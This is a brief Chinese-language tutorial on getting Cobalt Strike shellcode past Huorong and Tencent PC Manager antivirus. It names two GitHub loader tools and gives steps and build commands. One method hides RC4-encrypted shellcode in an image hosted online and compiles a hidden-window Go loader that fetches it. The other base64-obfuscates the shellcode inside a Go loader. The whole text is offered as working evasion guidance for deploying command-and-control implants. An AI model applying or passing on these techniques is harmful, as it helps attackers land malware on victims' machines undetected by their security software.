cobalt strike免杀火绒和管家

0、简介

CS生成C格式的shellcode:

Attacks ——> packages ——> Payload Generator 选择一个listener 生成payload.c

1、CS-Avoid-killing

工具地址:Gality369/CS-Loader: CS免杀 (github.com)

img

图片放入同一文件夹下,将shellcode填入generator.py

img

img

1
2
# 生成的shellcode会自动追加到图片末尾
python2 generator.py YourRC4key ImageName

img

将shellcode图片上传至ImgTP图床(找那种不会压缩的图床,保证shellcode不会被删掉)。在CS-Loader.go中填入你的图片url和RC4key。

1
2
# 编译
go build -ldflags="-H windowsgui" CS-Loader.go

img

img

img

火绒

img

腾讯电脑管家

img

2、bypassAV

工具地址:pureqh/bypassAV: 免杀shellcode加载器 (github.com)

img

  1. 将shellcode填至go_shellcode_encode.py生成混淆后的base64 payload
  2. 将生成的base64 payload填至main.go build(“shellcode”)
  3. 将main.go中的url替换为某个网页(可以正常访问)
  4. 编译:go build -trimpath -ldflags=”-w -s -H=windowsgui” main.go

img

img

火绒

img

腾讯电脑管家

img